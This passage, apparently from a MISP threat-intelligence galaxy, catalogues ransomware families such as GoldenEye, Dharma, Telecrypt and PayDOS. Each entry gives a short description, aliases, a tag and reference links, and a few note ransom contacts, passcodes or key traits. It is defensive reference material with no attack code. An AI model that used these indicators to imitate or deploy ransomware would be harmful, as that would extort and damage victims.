It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…

The tag is: misp-galaxy:ransomware="GoldenEye Ransomware"

GoldenEye Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Petya" with estimative-language:likelihood-probability="likely"

Table 8079. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/goldeneye-ransomware.html

https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/

https://www.bleepingcomputer.com/forums/t/634778/golden-eye-virus/

Sage Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…

The tag is: misp-galaxy:ransomware="Sage Ransomware"

Table 8080. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/sage-ransomware.html

https://www.bleepingcomputer.com/forums/t/634978/sage-file-sample-extension-sage/

https://www.bleepingcomputer.com/forums/t/634747/sage-20-ransomware-sage-support-help-topic/

SQ_ Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… This hacker requests 4 bitcoins for ransom.

The tag is: misp-galaxy:ransomware="SQ Ransomware"_

SQ_ Ransomware is also known as:

  • VO_ Ransomware

Table 8081. Table References

Links

https://id-ransomware.blogspot.co.il/2016/12/sq-vo-ransomware.html

Satan666 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Satan666 Ransomware"

Table 8083. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html

RIP (Phoenix) Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: misp-galaxy:ransomware="RIP (Phoenix) Ransomware"

RIP (Phoenix) Ransomware is also known as:

  • RIP

  • Phoenix

Table 8084. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html

https://twitter.com/BleepinComputer/status/804810315456200704

Locked-In Ransomware or NoValid Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on RemindMe

The tag is: misp-galaxy:ransomware="Locked-In Ransomware or NoValid Ransomware"

Locked-In Ransomware or NoValid Ransomware is also known as:

  • Locked-In Ransomware

  • NoValid Ransomware

Table 8085. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html

https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/

https://twitter.com/struppigel/status/807169774098796544

Chartwig Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Chartwig Ransomware"

Table 8086. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html

RenLocker Ransomware (FAKE)

It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files don’t actually get encrypted, their names get changed using this formula: [number][.crypter]

The tag is: misp-galaxy:ransomware="RenLocker Ransomware (FAKE)"

Table 8087. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html

Thanksgiving Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Thanksgiving Ransomware"

Table 8088. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html

https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html

https://twitter.com/BleepinComputer/status/801486420368093184

CockBlocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CockBlocker Ransomware"

Table 8089. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html

https://twitter.com/jiriatvirlab/status/801910919739674624

Lomix Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on the idiotic open-source ransomware called CryptoWire

The tag is: misp-galaxy:ransomware="Lomix Ransomware"

Table 8090. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html

https://twitter.com/siri_urz/status/801815087082274816

OzozaLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. https://3.bp.blogspot.com/--jubfYRaRmw/WDaOyZXkAaI/AAAAAAAACQE/E63a4FnaOfACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png

The tag is: misp-galaxy:ransomware="OzozaLocker Ransomware"

Table 8091. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html

https://decrypter.emsisoft.com/ozozalocker

https://twitter.com/malwrhunterteam/status/801503401867673603

Crypute Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Crypute Ransomware"

Crypute Ransomware is also known as:

  • m0on Ransomware

Table 8092. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html

https://www.bleepingcomputer.com/virus-removal/threat/ransomware/

NMoreira Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="NMoreira Ransomware"

NMoreira Ransomware is also known as:

  • Fake Maktub Ransomware

Table 8093. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html

https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html

VindowsLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom amount is 349.99$ and the hacker seems to be from India. He disguises himself as Microsoft Support.

The tag is: misp-galaxy:ransomware="VindowsLocker Ransomware"

Table 8094. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html

https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3hjw5m3sw84k8hlph

https://rol.im/VindowsUnlocker.zip

https://twitter.com/JakubKroustek/status/800729944112427008

https://www.bleepingcomputer.com/news/security/vindowslocker-ransomware-mimics-tech-support-scam-not-the-other-way-around/

Donald Trump 2 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Here is the original ransomware under this name: http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html

The tag is: misp-galaxy:ransomware="Donald Trump 2 Ransomware"

Table 8095. Table References

Links

http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html

https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/

Nagini Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Looks for C:\Temp\voldemort.horcrux

The tag is: misp-galaxy:ransomware="Nagini Ransomware"

Nagini Ransomware is also known as:

  • Voldemort Ransomware

Table 8096. Table References

Links

http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html

https://www.bleepingcomputer.com/news/security/the-nagini-ransomware-sics-voldemort-on-your-files/

ShellLocker Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="ShellLocker Ransomware"

Table 8097. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html

https://twitter.com/JakubKroustek/status/799388289337671680

Chip Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Chip Ransomware"

Chip Ransomware is also known as:

  • ChipLocker Ransomware

Table 8098. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html

http://malware-traffic-analysis.net/2016/11/17/index.html

https://www.bleepingcomputer.com/news/security/rig-e-exploit-kit-now-distributing-new-chip-ransomware/

Dharma Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS > Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant

The tag is: misp-galaxy:ransomware="Dharma Ransomware"

Table 8099. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html

https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/

https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/demonslay335/status/1049313390097813504

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

https://twitter.com/JakubKroustek/status/1038680437508501504

https://twitter.com/demonslay335/status/1059521042383814657

https://twitter.com/demonslay335/status/1059940414147489792

https://twitter.com/JakubKroustek/status/1060825783197933568

https://twitter.com/JakubKroustek/status/1064061275863425025

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

https://www.youtube.com/watch?v=qjoYtwLx2TI

https://twitter.com/GrujaRS/status/1072139616910757888

Angela Merkel Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Angela Merkel Ransomware"

Table 8100. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html

https://twitter.com/malwrhunterteam/status/798268218364358656

CryptoLuck Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoLuck Ransomware"

CryptoLuck Ransomware is also known as:

  • YafunnLocker

Table 8101. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html

http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/

https://twitter.com/malwareforme/status/798258032115322880

Crypton Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Crypton Ransomware"

Crypton Ransomware is also known as:

  • Nemesis

  • X3M

Table 8102. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html

https://decrypter.emsisoft.com/crypton

https://www.bleepingcomputer.com/news/security/crypton-ransomware-is-here-and-its-not-so-bad-/

https://twitter.com/JakubKroustek/status/829353444632825856

Karma Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. pretends to be a Windows optimization program called Windows-TuneUp

The tag is: misp-galaxy:ransomware="Karma Ransomware"

Table 8103. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html

https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-18th-2016-crysis-cryptoluck-chip-and-more/

WickedLocker HT Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="WickedLocker HT Ransomware"

Table 8104. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html

PClock3 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoLocker Copycat

The tag is: misp-galaxy:ransomware="PClock3 Ransomware"

PClock3 Ransomware is also known as:

  • PClock SuppTeam Ransomware

  • WinPlock

  • CryptoLocker clone

Table 8105. Table References

Links

https://www.bleepingcomputer.com/news/security/old-cryptolocker-copycat-named-pclock-resurfaces-with-new-attacks/

https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html

http://researchcenter.paloaltonetworks.com/2015/09/updated-pclock-ransomware-still-comes-up-short/

https://decrypter.emsisoft.com/

Kolobo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Kolobo Ransomware"

Kolobo Ransomware is also known as:

  • Kolobocheg Ransomware

Table 8106. Table References

Links

https://www.ransomware.wiki/tag/kolobo/

https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html

https://forum.drweb.com/index.php?showtopic=315142

PaySafeGen (German) Ransomware

This is most likely to affect German speaking users, since the note is written in German. Mostly affects users in German speaking countries. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="PaySafeGen (German) Ransomware"

PaySafeGen (German) Ransomware is also known as:

  • Paysafecard Generator 2016

  • PaySafeCard

  • PaySafeGen

Table 8107. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html

https://twitter.com/JakubKroustek/status/796083768155078656

Telecrypt Ransomware

This is most likely to affect Russian speaking users, since the note is written in Russian. Therefore, residents of Russian speaking country are affected. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransomware’s authors would request around $75 from their victims to provide them with a decryptor (payments are accepted via Russian payment services Qiwi or Yandex.Money ). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. Telecrypt will generate a random string to encrypt with that is between 10-20 length and only contain the letters vo,pr,bm,xu,zt,dq.

The tag is: misp-galaxy:ransomware="Telecrypt Ransomware"

Table 8108. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html

http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked

https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3

https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/

https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/

CerberTear Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CerberTear Ransomware"

Table 8109. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html

https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/

https://twitter.com/struppigel/status/795630452128227333

FuckSociety Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Hidden Tear >> APT Ransomware + HYPERLINK "https://id-ransomware.blogspot.ru/2016/05/remindme-ransomware-2.html" "_blank" RemindMe > FuckSociety

The tag is: misp-galaxy:ransomware="FuckSociety Ransomware"

Table 8110. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html

PayDOS Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Batch file; Passcode: AES1014DW256 or RSA1014DJW2048

The tag is: misp-galaxy:ransomware="PayDOS Ransomware"

PayDOS Ransomware is also known as:

  • Serpent Ransomware

Table 8111. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/paydos-ransomware-serpent.html

https://www.bleepingcomputer.com/news/security/ransomware-goes-retro-with-paydos-and-serpent-written-as-batch-files/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

https://www.proofpoint.com/us/threat-insight/post/new-serpent-ransomware-targets-danish-speakers

zScreenLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="zScreenLocker Ransomware"

Table 8112. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/zscreenlocker-ransomware.html

https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/

https://twitter.com/struppigel/status/794077145349967872

Gremit Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Gremit Ransomware"

Table 8113. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/gremit-ransomware.html

https://twitter.com/struppigel/status/794444032286060544

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

Hollycrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Hollycrypt Ransomware"

Table 8114. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html

BTCLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="BTCLocker Ransomware"

BTCLocker Ransomware is also known as:

  • BTC Ransomware

Table 8115. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html

Kangaroo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. From the developer behind the Apocalypse Ransomware, Fabiansomware, and Esmeralda

The tag is: misp-galaxy:ransomware="Kangaroo Ransomware"

Table 8116. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html

https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/

DummyEncrypter Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="DummyEncrypter Ransomware"

Table 8117. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/dummyencrypter-ransomware.html

Encryptss77 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Encryptss77 Ransomware"

Encryptss77 Ransomware is also known as:

  • SFX Monster Ransomware

Table 8118. Table References

Links

http://virusinfo.info/showthread.php?t=201710

https://id-ransomware.blogspot.co.il/2016/11/encryptss77-ransomware.html

WinRarer Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="WinRarer Ransomware"

Table 8119. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/winrarer-ransomware.html

Russian Globe Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Russian Globe Ransomware"

Table 8120. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html

ZeroCrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="ZeroCrypt Ransomware"

Table 8121. Table References

Links

https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html

RotorCrypt(RotoCrypt, Tar) Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="RotorCrypt(RotoCrypt, Tar) Ransomware"

RotorCrypt(RotoCrypt, Tar) Ransomware is also known as:

  • RotorCrypt

  • RotoCrypt

  • Tar Ransomware

Table 8122. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/demonslay335/status/1050117756094476289

Ishtar Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.

The tag is: misp-galaxy:ransomware="Ishtar Ransomware"

Table 8123. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html

MasterBuster Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="MasterBuster Ransomware"

Table 8124. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html

https://twitter.com/struppigel/status/791943837874651136

JackPot Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="JackPot Ransomware"

JackPot Ransomware is also known as:

  • Jack.Pot Ransomware

Table 8125. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/jackpot-ransomware.html

https://twitter.com/struppigel/status/791639214152617985

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

ONYX Ransomeware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Georgian ransomware

The tag is: misp-galaxy:ransomware="ONYX Ransomeware"

Table 8126. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/onyx-ransomware.html

https://twitter.com/struppigel/status/791557636164558848

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

IFN643 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="IFN643 Ransomware"

Table 8127. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/ifn643-ransomware.html

https://twitter.com/struppigel/status/791576159960072192

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-28-2016-locky-angry-duck-and-more/

Alcatraz Locker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Alcatraz Locker Ransomware"

Table 8128. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/alcatraz-locker-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/

https://twitter.com/PolarToffee/status/792796055020642304

Esmeralda Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Esmeralda Ransomware"

Table 8129. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/esmeralda-ransomware.html

https://www.bleepingcomputer.com/forums/t/630835/esmeralda-ransomware/

EncrypTile Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="EncrypTile Ransomware"

Table 8130. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/encryptile-ransomware.html

Fileice Ransomware Survey Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of how the hacker tricks the user using the survey method. https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png The hacker definatly has a sense of humor: https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG

The tag is: misp-galaxy:ransomware="Fileice Ransomware Survey Ransomware"

Table 8131. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/fileice-ransomware-survey.html

https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

CryptoWire Ransomeware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="CryptoWire Ransomeware"

Table 8132. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/cryptowire-ransomware.html

https://twitter.com/struppigel/status/791554654664552448

https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/

Hucky Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on Locky

The tag is: misp-galaxy:ransomware="Hucky Ransomware"

Hucky Ransomware is also known as:

  • Hungarian Locky Ransomware

Table 8133. Table References

Links

https://id-ransomware.blogspot.co.il/2016/10/hucky-ransomware-hungarian-locky.html

https://blog.avast.com/hucky-ransomware-a-hungarian-locky-wannabe

https://twitter.com/struppigel/status/846241982347427840

Winnix Cryptor Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

